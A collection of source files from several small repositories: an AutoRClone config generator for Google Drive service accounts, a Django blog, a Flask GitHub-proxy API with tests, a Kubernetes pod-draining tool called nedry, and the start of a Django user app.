parser.add_argument('-n', '--name', type=str, default='untitled',
help='Name your AutoRClone job, AutoRClone creates a log for each job, naming your jobs may be beneficial.')
parser.add_argument('--log-file', type=str, default='logs/AutoRClone.log',
help='Path to log file.')
parser.add_argument('--rclone-log-file', type=str, default='logs/rclone.log',
help='Path to RClone log file.')
parser.add_argument('--service-account-dir', type=str, default='accounts',
help='The directory path of json files for service account credentials.')
parser.add_argument('-p', '--port', type=int, default=5572,
help='the port to run RClone rc. set it to different one if you want to run other instance.')
parser.add_argument('--sa-start-id', type=int, default=1,
help='Service account id to start with.')
parser.add_argument('--sa-end-id', type=int, default=600,
help='Service account id to end with.')
parser.add_argument('--rclone-config-path', type=str,
help='Path to existing config file with the source and destination remotes.')
parser.add_argument('--dry-run', action='store_true',
help='For testing: make RClone dry-run.')
parser.add_argument('--bwlimit', type=str, default='0',
help='Specify the desired bandwidth in kBytes/s, or use a suffix b|k|M|G. The default is 0 which means to not limit bandwidth. eg. 10M')
parser.add_argument('--tpslimit', type=float, default=4,
help='Set the maximum amount of HTTP transactions per second. Use 0 used when no limit is required.')
parser.add_argument('--transfers', type=int, default=4,
help='Sets the number of file transfers to be run in parallel.')
parser.add_argument('--drive-chunk-size', type=str, default='8M',
help='Upload chunk size. Must a power of 2 >= 256k. Making this larger will improve performance, but note that each chunk is buffered in memory one per transfer.')
parser.add_argument('--delete-empty-src-dirs', action='store_true',
help='Delete empty source dirs after move.')
parser.add_argument('--create-empty-src-dirs', action='store_true',
help='Create empty source dirs on destination after sync.')
parser.add_argument('-v', action='store_true',
help='Outputs RClone information to log file about each transfer and prints stats once a minute by default.')
parser.add_argument('-vv', action='store_true',
help='Outputs lots of RClone debug info to the log file - useful for bug reports and really finding out what RClone is doing.')
parser.add_argument('--debug', action='store_true',
help='Prints AutoRClone debug information, saves output to log file.')
parser.add_argument('--generated-config-path', type=str, default='./rclone-generated.conf',
help='Desired path of the generated config file.')
args = parser.parse_args()
return args
--- FILE SEPARATOR ---
import os
import json
from distutils.util import strtobool as stb
# --------------------------------------
first = ""
second = ""
third = ""
# Example: OWNER_ID = 619418070
# dont edit below this >
first = os.environ.get('first', first)
second = os.environ.get('second', second)
third = os.environ.get('third', third)
--- FILE SEPARATOR ---
import glob
import os
import sys
from util import config_parser
from pathlib import Path
from util.helpers import log
def gen_remote_template(src_or_dest, parsed_config, args, is_config_file_specified):
remote_template = None
found = False
remote_is_crypt = False
if is_config_file_specified:
for remote in parsed_config:
if remote.remote_name == src_or_dest:
found = True
if isinstance(remote, config_parser.crypt_remote):
crypt_remote_parts = remote.remote.split(':')
unencrypted_remote_found = False
remote_is_crypt = True
for unencrypted_remote in parsed_config:
if unencrypted_remote.remote_name == crypt_remote_parts[0]:
unencrypted_remote_found = True
remote_template = '[{}{:03d}]\n' \
'type = drive\n' \
'scope = drive\n' \
'service_account_file = {}\n'
if unencrypted_remote.team_drive:
remote_template += '{} = {}\n\n'.format('team_drive', unencrypted_remote.team_drive)
#elif unencrypted_remote.source_path_id:
# remote_template += '{} = {}\n\n'.format('source_path_id', unencrypted_remote.source_path_id)
if unencrypted_remote_found:
break
if not unencrypted_remote_found:
log('Invalid RClone config, crypt remote with remote that does not exist!', 'ERROR', args)
sys.exit(-1)
remote_template += '[{}{:03d}_crypt]\n' \
'type = crypt\n' \
'remote = {}{:03d}:' + crypt_remote_parts[1] + '\n' \
'filename_encryption = ' + remote.filename_encryption + '\n' \
'directory_name_encryption = ' + remote.directory_name_encryption + '\n' \
'password = ' + remote.password + '\n'
if remote.password2:
remote_template += 'password2 = ' + remote.password2 + '\n\n'
else:
remote_template += '\n'
else:
remote_template = "[{}{:03d}]\n" \
"type = drive\n" \
"scope = drive\n" \
"service_account_file = {}\n"
if remote.team_drive:
remote_template += "{} = {}\n\n".format("team_drive", remote.team_drive)
elif remote.source_path_id:
remote_template += "{} = {}\n\n".format("source_path_id", remote.source_path_id)
# If remote is found exit loop
if found:
break
if not found:
if len(src_or_dest) == 33:
folder_or_team_drive_src = 'root_folder_id'
elif len(src_or_dest) == 19:
folder_or_team_drive_src = 'team_drive'
elif is_config_file_specified:
log('The config file ' + args.rclone_config_path + ' was specified, ' + src_or_dest +
' was not a valid remote found in the config file, and is not a valid Team Drive ID or publicly shared Root Folder ID', "ERROR", args)
sys.exit(-1)
else:
log(src_or_dest + ' is not a valid Team Drive ID or publicly shared Root Folder ID', 'ERROR', args)
sys.exit(-1)
remote_template = "[{}{:03d}]\n" \
"type = drive\n" \
"scope = drive\n" \
"service_account_file = {}\n"
remote_template += "{} = {}\n\n".format(folder_or_team_drive_src, src_or_dest)
return remote_template, remote_is_crypt
def gen_rclone_cfg(args, filepath):
sa_files = glob.glob(os.path.join(args.service_account_dir, '*.json'))
if len(sa_files) == 0:
log('No json files found in ./{}'.format(args.service_account_dir), 'ERROR', args)
sys.exit(-1)
source_remote = None
dest_remote = None
src_is_crypt = False
dst_is_crypt = False
is_config_file_specified = False
parsed_config = None
if args.rclone_config_path:
is_config_file_specified = True
parsed_config = config_parser.parse_config(args.rclone_config_path)
# Source parsing
if args.source:
source_remote, src_is_crypt = gen_remote_template(args.source, parsed_config, args, is_config_file_specified)
# Destination parsing
if args.destination:
dest_remote, dst_is_crypt = gen_remote_template(args.destination, parsed_config, args,is_config_file_specified)
with open(filepath, 'w') as fp:
for i, filename in enumerate(sa_files):
dir_path = os.path.dirname(Path(os.path.realpath(__file__)).parent)
filename = os.path.join(dir_path, filename)
filename = filename.replace(os.sep, '/')
index = i + 1
if source_remote:
if src_is_crypt:
remote_type = 'src'
fp.write(source_remote.format(remote_type, index, filename, remote_type, index, remote_type, index))
else:
fp.write(source_remote.format('src', index, filename))
if dest_remote:
if dst_is_crypt:
remote_type = 'dst'
fp.write(dest_remote.format(remote_type, index, filename, remote_type, index, remote_type, index))
else:
fp.write(dest_remote.format('dst', index, filename))
return i, src_is_crypt, dst_is_crypt
--- FILE SEPARATOR ---
import sys
from dataclasses import dataclass
@dataclass
class drive_remote:
remote_name: str
team_drive: str
root_folder_id: str
@dataclass
class crypt_remote:
remote_name: str
remote: str
filename_encryption: str
directory_name_encryption: bool
# Hashed password and salt
password: str
password2: str
def parse_config(file_path):
try:
file = open(file_path, 'r')
except FileNotFoundError:
print("Rclone config file not found!")
sys.exit(-1)
config_content = file.read()
remotes_unparsed = []
remotes_tmp = config_content.split('[')
for i in range(1, len(remotes_tmp)):
remote_tmp = remotes_tmp[i].split(']\n')
# ['Remote Name', 'Remote Data']
remotes_unparsed.append([remote_tmp[0], remote_tmp[1]])
remotes_parsed = []
for remote in remotes_unparsed:
name = remote[0]
data = remote[1]
properties = []
data_tmp = data.split('\n')
# Remove empty array items caused by \n characters
data_tmp = list(filter(None, data_tmp))
for data in data_tmp:
data_split = data.split('=')
# ['Property', 'Value']
properties.append([data_split[0].strip(), data_split[1].strip()])
remotes_parsed.append([name, properties])
remotes = []
for remote in remotes_parsed:
name = remote[0]
properties = remote[1]
remote_type = None
team_drive = None
root_folder_id = None
remote = None
filename_encryption = None
directory_name_encryption = None
password = None
password2 = None
for prop in properties:
if prop[0] == "type":
remote_type = prop[1]
elif prop[0] == "team_drive":
team_drive = prop[1]
elif prop[0] == "root_folder_id":
root_folder_id = prop[1]
elif prop[0] == "remote":
remote = prop[1]
elif prop[0] == "filename_encryption":
filename_encryption = prop[1]
elif prop[0] == "directory_name_encryption":
directory_name_encryption = prop[1]
elif prop[0] == "password":
password = prop[1]
elif prop[0] == "password2":
password2 = prop[1]
if remote_type == "drive":
if team_drive or root_folder_id:
new_remote = drive_remote(name, team_drive, root_folder_id)
else:
pass
elif remote_type == "crypt":
new_remote = crypt_remote(name, remote, filename_encryption, directory_name_encryption, password, password2)
remotes.append(new_remote)
return remotes
--- FILE SEPARATOR ---
import platform
import subprocess
import sys
import distutils
import time
from pathlib import Path
import os
def is_windows():
return platform.system() == 'Windows'
def calculate_duration(time_start):
time_stop = time.time()
hours, rem = divmod((time_stop - time_start), 3600)
minutes, sec = divmod(rem, 60)
return "{:0>2}:{:0>2}:{:05.2f}".format(int(hours), int(minutes), sec)
def check_rclone_exists():
rclone_prog = 'rclone'
if is_windows():
rclone_prog += ".exe"
#ret = distutils.spawn.find_executable(rclone_prog)
ret = True
if ret is None:
sys.exit("To use AutoRClone you must install RClone first: https://rclone.org/downloads/")
return ret
def convert_bytes_to_best_unit(bytes_value):
bytes_value = float(bytes_value)
value_tmp = bytes_value * 1e-15
if value_tmp >= 1:
return str(round(value_tmp, 1)) + "PB"
value_tmp = bytes_value * 1e-12
if value_tmp >= 1:
return str(round(value_tmp, 1)) + "TB"
value_tmp = bytes_value * 1e-9
if value_tmp >= 1:
return str(round(value_tmp, 1)) + "GB"
value_tmp = bytes_value * 1e-6
if value_tmp >= 1:
return str(round(value_tmp, 1)) + "MB"
value_tmp = bytes_value * 1e-3
if value_tmp >= 1:
return str(round(value_tmp, 1)) + "kB"
return str(bytes_value) + "B"
# Calculate path size in bytes using RClone
def calculate_path_size(path, config_file):
response = subprocess.check_output('rclone --config {} size \"{}\"'.format(config_file, path), shell=True, stderr=subprocess.DEVNULL)
response_processed = response.decode('utf-8').replace('\0', '')
response_bytes = response_processed.split('(')[1]
response_bytes = response_bytes.replace('Bytes)', '').strip()
return response_bytes
def log(msg, level, args, end=None):
if level == "DEBUG" and not args.debug:
return
ts = time.gmtime()
timestamp = time.strftime("%Y-%m-%d %H:%M:%S", ts)
message = '[{}] [AutoRClone] ({}) [{}] {}\n'.format(timestamp, args.name, level, msg)
if end:
print(message.replace('\n', ''), end=end)
else:
print(message.replace('\n', ''))
# File logging
file_path = args.log_file
Path(os.path.split(file_path)[0]).mkdir(parents=True, exist_ok=True)
logfile = open(file_path, 'a+')
logfile.write(message)
logfile.close()
def calculate_transfer_eta(bytes_to_transfer, transfer_speed_bytes):
if bytes_to_transfer == 0 or transfer_speed_bytes == 0:
return "Calculating ETA..."
# time in seconds
time = bytes_to_transfer / transfer_speed_bytes
hours, rem = divmod((time), 3600)
minutes, sec = divmod(rem, 60)
eta_string = ""
if hours > 1:
eta_string += '{}h, '.format(int(hours))
if minutes > 1:
eta_string += '{}m, '.format(int(minutes))
if sec > 1:
eta_string += '{}s'.format(int(sec))
return eta_string
|
[
"/autorclone.py",
"/config.py",
"/start.py",
"/util/arg_parser.py",
"/util/config.py",
"/util/config_gen.py",
"/util/config_parser.py",
"/util/helpers.py"
] |
001vijay1/onlineproject
|
from django.contrib import admin
from .models import Post,Comment,Contact,Category
# Register your models here.
admin.site.register(Post)
admin.site.register(Category)
admin.site.register(Contact)
admin.site.register(Comment)
--- FILE SEPARATOR ---
# Generated by Django 2.2.4 on 2019-10-20 11:28
import ckeditor_uploader.fields
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created at')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Updated at')),
('title', models.CharField(max_length=255, verbose_name='Title')),
],
options={
'verbose_name': 'Category',
'verbose_name_plural': 'Categories',
'ordering': ['title'],
},
),
migrations.CreateModel(
name='Contact',
fields=[
('msg_id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=50)),
('email', models.CharField(default='', max_length=50)),
('phone', models.CharField(default='', max_length=50)),
('desc', models.CharField(default='', max_length=500)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('image', models.ImageField(default='asc.png', upload_to='banner_image')),
('description', ckeditor_uploader.fields.RichTextUploadingField(blank=True, null=True)),
('slug', models.SlugField(max_length=200, unique=True)),
('date', models.DateTimeField(auto_now_add=True)),
('auther', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogapp.Category', verbose_name='Category')),
],
options={
'ordering': ('-date',),
},
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('email', models.EmailField(max_length=254)),
('message', models.TextField()),
('created', models.DateTimeField(auto_now_add=True)),
('active', models.BooleanField(default=True)),
('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='replies', to='blogapp.Comment')),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='blogapp.Post')),
],
options={
'ordering': ('-created',),
},
),
]
--- FILE SEPARATOR ---
from ckeditor_uploader.fields import RichTextUploadingField
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import pre_save
from django.dispatch import receiver
from django.utils import timezone
# Create your models here.
from django.utils.text import slugify
class Category(models.Model):
created_at = models.DateTimeField(auto_now_add=True, verbose_name="Created at")
updated_at = models.DateTimeField(auto_now=True, verbose_name="Updated at")
title = models.CharField(max_length=255, verbose_name="Title")
class Meta:
verbose_name = "Category"
verbose_name_plural = "Categories"
ordering = ['title']
def __str__(self):
return self.title
class Post(models.Model):
auther = models.ForeignKey(User,on_delete=models.CASCADE)
title = models.CharField(max_length=100)
category = models.ForeignKey(Category, verbose_name="Category",on_delete=models.CASCADE)
image = models.ImageField(upload_to='banner_image',default='asc.png')
description = RichTextUploadingField(blank=True,null=True)
slug = models.SlugField(max_length=200,unique=True)
date = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ('-date',)
def publish(self):
self.is_published = True
self.published_at = timezone.now()
self.save()
def save(self, *args, **kwargs):
self.slug = self.slug or slugify(self.title)
super().save(*args, **kwargs)
def __str__(self):
return self.title
class Comment(models.Model):
post = models.ForeignKey(Post,on_delete=models.CASCADE,related_name='comments')
name = models.CharField(max_length=50)
email = models.EmailField()
message = models.TextField()
created = models.DateTimeField(auto_now_add=True)
active = models.BooleanField(default=True)
parent = models.ForeignKey('self',on_delete=models.CASCADE,null=True,blank=True,related_name='replies')
class Meta:
ordering = ('-created',)
def __str__(self):
return 'Commented by {}'.format(self.name)
#django signal
@receiver(pre_save,sender = Post)
def delete_old_image(sender,instance,*args,**kwargs):
if(instance.pk):
existing_image = Post.objects.get(pk=instance.pk)
if(instance.image and existing_image.image!=instance.image):
existing_image.image.delete(True)
class Contact(models.Model):
msg_id=models.AutoField(primary_key=True)
name=models.CharField(max_length=50)
email=models.CharField(max_length=50,default="")
phone=models.CharField(max_length=50,default="")
desc=models.CharField(max_length=500,default="")
def __str__(self):
return self.name
--- FILE SEPARATOR ---
from django.shortcuts import render,get_object_or_404,redirect
from .models import Post,Contact,Comment,Category
from .forms import CommentForm
# Create your views here.
def index(request):
form = Post.objects.all()
return render(request,'index.html',{'form':form})
def category_detail(request, pk):
category = get_object_or_404(Category, pk=pk)
return render(request, 'blog-single.html', {'category': category})
def blogdetails(request,slug):
relpost = Post.objects.all().filter(slug = slug)
categories = Category.objects.all()
posts = get_object_or_404(Post,slug=slug)
comments = posts.comments.filter(active=True, parent__isnull=True)
if(request.method=='POST'):
comment_form = CommentForm(data=request.POST)
if(comment_form.is_valid()):
parent_obj = None
try:
parent_id = int(request.POST.get('parent_id'))
except:
parent_id = None
if(parent_id):
parent_obj=Comment.objects.get(id = parent_id)
if(parent_obj):
reply_comment = comment_form.save(commit=False)
reply_comment.parent= parent_obj
new_comment = comment_form.save(commit=False)
new_comment.post = posts
new_comment.save()
return redirect('blogdetails',slug)
else:
comment_form = CommentForm()
context = {
'post':posts,
'comments':comments,
'comment_form':comment_form,
'category':categories,
'relpost':relpost,
}
return render(request,'blog-single.html',context)
def contact(request):
thanks = False
if(request.method=='POST'):
name = request.POST.get('name')
email = request.POST.get('email')
phone = request.POST.get('phone')
desc = request.POST.get('desc')
contact = Contact(name = name,email = email,phone = phone,desc = desc)
contact.save()
thanks = True
return render(request,'contact.html',{'thanks':thanks})
def about(request):
return render(request,'about.html')
|
[
"/blog/blogapp/admin.py",
"/blog/blogapp/migrations/0001_initial.py",
"/blog/blogapp/models.py",
"/blog/blogapp/views.py"
] |
0054/test
|
from flask import Flask
def create_app():
app = Flask(__name__)
from api.routes import api
app.register_blueprint(api)
return app
--- FILE SEPARATOR ---
from flask import current_app, Blueprint, jsonify
import requests
api = Blueprint('api', __name__)
URL = 'https://api.github.com'
@api.route('/')
def index():
return '''usage:
URL:5000/repo/<reponame>
URL:5000/check'''
@api.route('/repo/<reponame>')
def repo(reponame):
r = requests.get(URL + '/repos/0054/' + reponame).json()
return r
@api.route('/check')
def events():
r = requests.get(URL).json()
return r
--- FILE SEPARATOR ---
def test_200_root(client):
response = client.get("/")
assert response.status_code == 200
def test_200_repo_dotfiles(client):
response = client.get("/repo/dofiles")
assert response.status_code == 200
def test_200_events(client):
response = client.get("/check")
assert response.status_code == 200
|
[
"/api/__init__.py",
"/api/routes.py",
"/tests/test_api.py"
] |
007/nedry
|
import json
import random
import time
import kubernetes
from termcolor import colored
class NedryKube:
_DEBUG = False
# Wait up to 2x expected timeout for actions in pod deletion
POD_DELETE_MAX_WAIT = 2
def __init__(self):
self._api = {}
def k8s_ensure_initialized(self):
if 'initialized' not in self._api:
kubernetes.config.load_kube_config()
self._api['initialized'] = True
@property
def api_core(self):
if 'core' not in self._api:
self.k8s_ensure_initialized()
self._api['core'] = kubernetes.client.CoreV1Api()
self._api['core'].pool = None
return self._api['core']
@property
def api_extv1b1(self):
if 'extv1b1' not in self._api:
self.k8s_ensure_initialized()
self._api['extv1b1'] = kubernetes.client.ExtensionsV1beta1Api()
self._api['extv1b1'].pool = None
return self._api['extv1b1']
@property
def api_appsv1b1(self):
if 'appsv1b1' not in self._api:
self.k8s_ensure_initialized()
self._api['appsv1b1'] = kubernetes.client.AppsV1beta1Api()
self._api['appsv1b1'].pool = None
return self._api['appsv1b1']
def get_worker_nodes(self):
nodes = []
node_list = self.api_core.list_node(watch=False)
for n in node_list.items:
if 'kubernetes.io/role' in n.metadata.labels:
if n.metadata.labels['kubernetes.io/role'] == 'node':
nodes.append(n)
return nodes
def get_all_pods(self, ordered=False):
ret = self.api_core.list_pod_for_all_namespaces(watch=False)
if not ordered:
random.shuffle(ret.items)
return ret.items
def get_pods_on_node(self, nodes):
pods = []
match_names = []
for n in nodes:
match_names.append(n.metadata.name)
for p in self.get_all_pods():
if p.spec.node_name in match_names:
pods.append(p)
return pods
def calculate_max_probe_timeout(self, probe):
probe_timeout = probe.initial_delay_seconds
probe_timeout += probe.success_threshold * (probe.timeout_seconds + probe.period_seconds)
return probe_timeout
def calculate_wait_timeout(self, spec):
data = spec.template.spec
wait_timeout = 0
wait_timeout += data.termination_grace_period_seconds
container_max = -1
for container in data.containers:
container_live_timeout = 0
container_ready_timeout = 0
if container.liveness_probe:
container_live_timeout = self.calculate_max_probe_timeout(container.liveness_probe)
if container_live_timeout > container_max:
container_max = container_live_timeout
if container.readiness_probe:
container_ready_timeout = self.calculate_max_probe_timeout(container.readiness_probe)
if container_ready_timeout > container_max:
container_max = container_ready_timeout
return wait_timeout + container_max
def get_controller_status(self, namespace, controller_name, controller_type):
if self._DEBUG:
print('Looking up status of {controller_type} for {controller_name} in {space}'.format(
controller_type=controller_type,
controller_name=controller_name,
space=namespace))
controller_status = {'want': 0, 'ready': 0, 'available': 0, 'wait_timeout': 1}
# from most-common to least-common within our cluster
if controller_type == 'ReplicaSet':
# { # Ignore PyCommentedCodeBear
# "type": "ReplicaSet",
# "available_replicas": 1,
# "conditions": "",
# "fully_labeled_replicas": 1,
# "observed_generation": 3,
# "ready_replicas": 1,
# "replicas": 1
# }
rs = self.api_extv1b1.read_namespaced_replica_set_status(controller_name, namespace)
controller_status['want'] = rs.status.replicas
controller_status['ready'] = rs.status.ready_replicas
controller_status['available'] = rs.status.available_replicas
controller_status['wait_timeout'] = self.calculate_wait_timeout(rs.spec)
elif controller_type == 'StatefulSet':
# { # Ignore PyCommentedCodeBear
# "type": "StatefulSet",
# "collision_count": "",
# "conditions": "",
# "current_replicas": "",
# "current_revision": "service-713823586",
# "observed_generation": 4,
# "ready_replicas": 3,
# "replicas": 3,
# "update_revision": "service-4122884199",
# "updated_replicas": 3
# }
ss = self.api_appsv1b1.read_namespaced_stateful_set_status(controller_name, namespace)
controller_status['want'] = ss.status.replicas
controller_status['ready'] = ss.status.ready_replicas
controller_status['available'] = ss.status.ready_replicas
controller_status['wait_timeout'] = self.calculate_wait_timeout(ss.spec)
elif controller_type == 'DaemonSet':
# { # Ignore PyCommentedCodeBear
# "type": "DaemonSet",
# "collision_count": "",
# "conditions": "",
# "current_number_scheduled": 3,
# "desired_number_scheduled": 3,
# "number_available": 3,
# "number_misscheduled": 0,
# "number_ready": 3,
# "number_unavailable": "",
# "observed_generation": 32,
# "updated_number_scheduled": 3
# }
ds = self.api_extv1b1.read_namespaced_daemon_set_status(controller_name, namespace)
controller_status['want'] = ds.status.desired_number_scheduled
controller_status['ready'] = ds.status.number_ready
controller_status['available'] = ds.status.number_available
controller_status['wait_timeout'] = self.calculate_wait_timeout(ds.spec)
elif controller_type == 'Job':
print('JOB type not yet supported')
else:
print('Unknown parent type: {}'.format(controller_type))
return controller_status
def wait_for_healthy_controller(self, namespace, controller_name, controller_type):
status = self.get_controller_status(namespace, controller_name, controller_type)
print('Current state of {controller_type}.{controller_name} in {space} is '
'want: {want}, ready: {ready}, available: {available}'.format(
controller_type=controller_type,
controller_name=controller_name,
space=namespace,
**status
)
)
wait_timeout = status['wait_timeout'] * self.POD_DELETE_MAX_WAIT
if self._DEBUG:
print('Waiting up to {} seconds for pod to stabilize'.format(wait_timeout))
for loop in range(wait_timeout):
status = self.get_controller_status(namespace, controller_name, controller_type)
if status['want'] == status['ready'] and status['ready'] == status['available']:
break
time.sleep(1)
return status['want'] == status['ready'] and status['ready'] == status['available']
def delete_pod(self, namespace, pod_name, grace_period):
delete_options = kubernetes.client.V1DeleteOptions()
response = self.api_core.delete_namespaced_pod(pod_name, namespace, delete_options)
time.sleep(grace_period + 1)
def safe_delete_pod(self, pod):
namespace = pod.metadata.namespace
pod_name = pod.metadata.name
if pod.metadata.owner_references is None:
print(colored("*** {} is an orphan pod - that's weird and scary, so I'm outta here".format(pod_name), 'yellow'))
return
owner = pod.metadata.owner_references[0]
owner_type = owner.kind
owner_name = owner.name
if owner_type == 'DaemonSet':
print(colored("*** {} is part of a daemonset, not deleting".format(pod_name), 'yellow'))
return
status = self.wait_for_healthy_controller(namespace, owner_name, owner_type)
if status is False:
print(colored('Timed out waiting for controller {owner_type} for {pod} to go healthy, not deleting'.format(
owner_type=owner_type,
pod=pod_name),
'yellow',
'on_red'
))
return
print('Service is healthy, deleting pod {}'.format(pod_name))
self.delete_pod(namespace, pod_name, pod.spec.termination_grace_period_seconds)
status = self.wait_for_healthy_controller(namespace, owner_name, owner_type)
if status is False:
print(colored('Timed out waiting for controller {owner_type} for {pod} to come back up healthy'.format(
owner_type=owner_type,
pod=pod_name),
'yellow',
'on_red'
))
return
if self._DEBUG:
print('back to happy')
return
def suffixed_to_num(self, num):
if num[-1] == 'i':
suffix = num[-2:]
value = int(num[:-2])
if suffix == 'Ki':
return value * 1024
if suffix == 'Mi':
return value * 1024 * 1024
if suffix == 'Gi':
return value * 1024 * 1024 * 1024
if suffix == 'Ti':
return value * 1024 * 1024 * 1024 * 1024
elif num[-1] == 'm':
value = int(num[:-1])
return value
# fallthrough, assume we got a raw numeric value
return int(num)
def get_metrics(self):
raw_json = self.api_core.connect_get_namespaced_service_proxy_with_path('heapster', 'kube-system', '/apis/metrics/v1alpha1/pods')
raw = json.loads(raw_json.translate(str.maketrans("'", '"')))
metrics = {}
for e in raw['items']:
cpu = 0
mem = 0
for c in e['containers']:
usage = c['usage']
cpu = cpu + self.suffixed_to_num(usage['cpu'])
mem = mem + self.suffixed_to_num(usage['memory'])
m = e['metadata']
k8s_namespace = m['namespace']
k8s_podname = m['name']
if k8s_namespace not in metrics:
metrics[k8s_namespace] = {}
metrics[k8s_namespace][k8s_podname] = {'cpu': cpu, 'mem': mem}
return metrics
--- FILE SEPARATOR ---
#!/usr/bin/env python -u
import argparse
import datetime
from kube import NedryKube
from termcolor import colored
class Nedry:
_DEBUG = False
ANNOTATION_PREFIX = 'nedry-v1/'
ANNOTATION_ACTION = ANNOTATION_PREFIX + 'action'
ANNOTATION_SOFTLIMIT = ANNOTATION_PREFIX + 'limit'
ACTION_NOMATCH = None
ACTION_DRAIN = 'drain'
def __init__(self):
self.kube = NedryKube()
def log(self, x):
print('{}: {}'.format(datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f%z'), x))
def filter_nodes_by_action(self, action=ACTION_NOMATCH):
filtered = []
for n in self.kube.get_worker_nodes():
# skip node if it has no annotation
if self.ANNOTATION_ACTION not in n.metadata.annotations:
continue
# attempt to match our filter
if n.metadata.annotations[self.ANNOTATION_ACTION] == action:
filtered.append(n)
return filtered
def nodes_to_drain(self):
filtered = []
for n in self.filter_nodes_by_action(self.ACTION_DRAIN):
if n.spec.unschedulable:
filtered.append(n)
return filtered
def drain(self):
actionable_nodes = self.nodes_to_drain()
pods_to_drain = self.kube.get_pods_on_node(actionable_nodes)
self.log('Rescheduling {} pods'.format(len(pods_to_drain)))
for p in pods_to_drain:
self.kube.safe_delete_pod(p)
self.log('done')
def softlimit(self):
self.log("fetching pods")
pods = self.kube.get_all_pods()
self.log("fetching metrics")
metrics = self.kube.get_metrics()
self.log("mashing everything up")
for p in pods:
if self.ANNOTATION_SOFTLIMIT in p.metadata.annotations:
limit = self.kube.suffixed_to_num(p.metadata.annotations[self.ANNOTATION_SOFTLIMIT])
k8s_namespace = p.metadata.namespace
k8s_podname = p.metadata.name
# print('got one! {}/{}'.format(k8s_namespace, k8s_podname))
if k8s_namespace in metrics:
ns_metrics = metrics[k8s_namespace]
if k8s_podname in ns_metrics:
actual = ns_metrics[k8s_podname]['mem']
if actual > limit:
self.log(colored('{ns}/{pod}: {actual} > {limit}, soft kill'.format(
actual=actual,
limit=limit,
ns=k8s_namespace,
pod=k8s_podname),
'yellow',
'on_red'
))
self.kube.safe_delete_pod(p)
else:
self.log(colored('{ns}/{pod}: {actual} < {limit}, no action'.format(
actual=actual,
limit=limit,
ns=k8s_namespace,
pod=k8s_podname),
'green'
))
if __name__ == '__main__':
nedry = Nedry()
parser = argparse.ArgumentParser(prog='nedry')
parser.set_defaults(action=parser.print_help)
subparsers = parser.add_subparsers(help='sub-command help')
drain_parser = subparsers.add_parser('drain', help='drain a node safely')
drain_parser.set_defaults(action=nedry.drain)
softlimit_parser = subparsers.add_parser('softlimit', help='run soft-kill for soft memory limits')
softlimit_parser.set_defaults(action=nedry.softlimit)
args = parser.parse_args()
args.action()
|
[
"/kube.py",
"/nedry.py"
] |
007Saikat/idil_demo
|
from django import forms
from django.contrib.auth.models import User
from .models import UserDetail
class UserForm(forms.ModelForm):
password=forms.CharField(widget=forms.PasswordInput(attrs={'placeholder':'Enter Password*','class':"form-control"}))
username=forms.CharField(widget=forms.TextInput(attrs={'placeholder':'Enter username*','class':"form-control"}))
first_name = forms.CharField(max_length=75, required=True,widget= forms.TextInput(attrs={'placeholder':'Enter your first name*','class': "form-control"}))
last_name=forms.CharField(max_length=75,required=False,widget= forms.TextInput(attrs={'placeholder':'Enter your Last name','class': "form-control"}))
email = forms.CharField(max_length=75, required=True,widget= forms.TextInput(attrs={'placeholder':'Enter email address*','class': "form-control"}))
class Meta():
model=User
fields=('username','first_name','last_name','email','password')
class UserDetailForm(forms.ModelForm):
profile_pic=forms.ImageField(required=False)
class Meta():
model=UserDetail
fields=('profile_pic',)
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-17 18:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('basic_app', '0002_auto_20200817_1353'),
]
operations = [
migrations.AlterField(
model_name='userdetail',
name='role',
field=models.CharField(blank=True, default='employee', max_length=100, null=True),
),
]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-19 16:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('basic_app', '0005_auto_20200819_2116'),
]
operations = [
migrations.AlterField(
model_name='userdetail',
name='role',
field=models.CharField(choices=[('A', 'admin'), ('E', 'employee')], default='E', max_length=128),
),
]
--- FILE SEPARATOR ---
from django.db import models
from django.contrib.auth.models import User
import os
from uuid import uuid4
def path_and_rename(instance, filename):
upload_to = 'profile_pics'
ext = filename.split('.')[-1]
# get filename
if instance.pk:
filename = '{}.{}'.format(instance.pk, ext)
else:
# set filename as random string
filename = '{}.{}'.format(uuid4().hex, ext)
# return the whole path to the file
return os.path.join(upload_to, filename)
# Create your models here.
class UserDetail(models.Model):
user=models.OneToOneField(User,on_delete=models.CASCADE)
role=models.CharField(max_length=128,default='employee')
profile_pic=models.ImageField(upload_to=path_and_rename,blank=True,null=True)
last_login = models.DateTimeField(blank=True,null=True)
def __str__(self):
return self.user.username
--- FILE SEPARATOR ---
from django.urls import path,include
from basic_app import views
app_name='basic_app'
urlpatterns = [
path('',views.login_register,name='login_register'),
path('index/',views.index,name='index'),
path('manage_acc/<username>',views.acc,name='acc'),
path('upload/<username>',views.upload,name='upload'),
path('save/<username>',views.save,name='save'),
path('change/<username>',views.change,name='change'),
path('update/<username>',views.update,name='update'),
path('show/<username>',views.show,name='show'),
path('apply/<username>',views.apply,name='apply'),
path('logout',views.user_logout,name='user_logout'),
]
--- FILE SEPARATOR ---
from django.shortcuts import render,redirect
